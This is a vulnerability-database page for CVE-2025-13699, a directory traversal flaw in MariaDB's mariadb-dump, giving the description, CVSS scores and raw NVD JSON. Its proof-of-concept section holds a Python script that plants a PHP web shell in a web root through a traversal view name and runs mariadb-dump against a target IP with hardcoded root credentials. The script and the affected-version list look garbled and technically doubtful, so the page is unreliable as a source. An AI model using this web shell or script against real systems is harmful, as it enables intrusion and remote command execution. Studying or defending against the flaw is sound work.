Security Vulnerability Report
中文
CVE-2025-13699 CVSS 7.0 HIGH

CVE-2025-13699

Published: 2025-12-23 22:15:45
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

MariaDB mariadb-dump Utility Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of MariaDB. Interaction with the mariadb-dump utility is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the handling of view names. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27000.

CVSS Details

CVSS Score
7.0
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

MariaDB Server < 10.11.x (具体版本需参考官方修复公告)
MariaDB Server < 10.6.x (长期支持版本)
MariaDB Server < 10.5.x (历史版本)
所有使用受影响mariadb-dump版本的 installations

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13699 PoC - MariaDB mariadb-dump Directory Traversal RCE # Reference: ZDI-CAN-27000 import socket import subprocess import sys def exploit_mariadb_dump(target_ip, target_port=3306): """ Exploit for CVE-2025-13699: MariaDB mariadb-dump Directory Traversal This PoC demonstrates how a malicious view name with directory traversal can be used to write files to arbitrary locations via mariadb-dump. Prerequisites: - Valid MariaDB credentials - Ability to create views - Access to mariadb-dump utility """ # Malicious view name with directory traversal # This pattern exploits the lack of path validation in mariadb-dump malicious_view_name = "'../../../../../../var/www/html/shell.php'" # SQL to create malicious view create_view_sql = f""" CREATE OR REPLACE VIEW {malicious_view_name} AS SELECT '<?php system($_GET["cmd"]); ?>' AS payload; """ print(f"[*] Target: {target_ip}:{target_port}") print(f"[*] Creating malicious view with directory traversal...") print(f"[*] View name: {malicious_view_name}") try: # Connect to MariaDB and execute malicious SQL # Using mysql client or pymysql subprocess.run([ 'mysql', '-h', target_ip, '-P', str(target_port), '-u', 'root', '-p', 'password', '-e', create_view_sql ], check=True, capture_output=True) print("[+] Malicious view created successfully") print("[*] Now triggering mariadb-dump to trigger file write...") # Trigger mariadb-dump with the malicious view # This will cause mariadb-dump to write to the traversed path dump_cmd = [ 'mariadb-dump', '-h', target_ip, '-P', str(target_port), '-u', 'root', '-p', 'password', '--single-transaction', '--all-databases' ] result = subprocess.run(dump_cmd, capture_output=True, text=True) if result.returncode == 0: print("[+] mariadb-dump executed successfully") print("[*] Check for written shell at /var/www/html/shell.php") else: print(f"[-] mariadb-dump failed: {result.stderr}") except subprocess.CalledProcessError as e: print(f"[-] Execution failed: {e}") except FileNotFoundError: print("[-] MySQL client not found. Please install mysql-client or pymysql.") def check_vulnerability(target_ip): """ Check if target is vulnerable to CVE-2025-13699 """ print(f"[*] Checking vulnerability status for {target_ip}...") # Version check would go here print("[*] Please verify MariaDB version < 10.11.x or unpatched versions") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-13699.py <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 3306 check_vulnerability(target) exploit_mariadb_dump(target, port) # Note: This is a conceptual PoC. Actual exploitation requires: # 1. Valid database credentials # 2. CREATE VIEW privileges # 3. Access to mariadb-dump utility # 4. Knowledge of target filesystem layout

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13699", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:44.800", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "MariaDB mariadb-dump Utility Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of MariaDB. Interaction with the mariadb-dump utility is required to exploit this vulnerability but attack vectors may vary depending on the implementation.\n\nThe specific flaw exists within the handling of view names. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27000."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://jira.mariadb.org/browse/MDEV-37483", "source": "[email protected]"}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1025/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.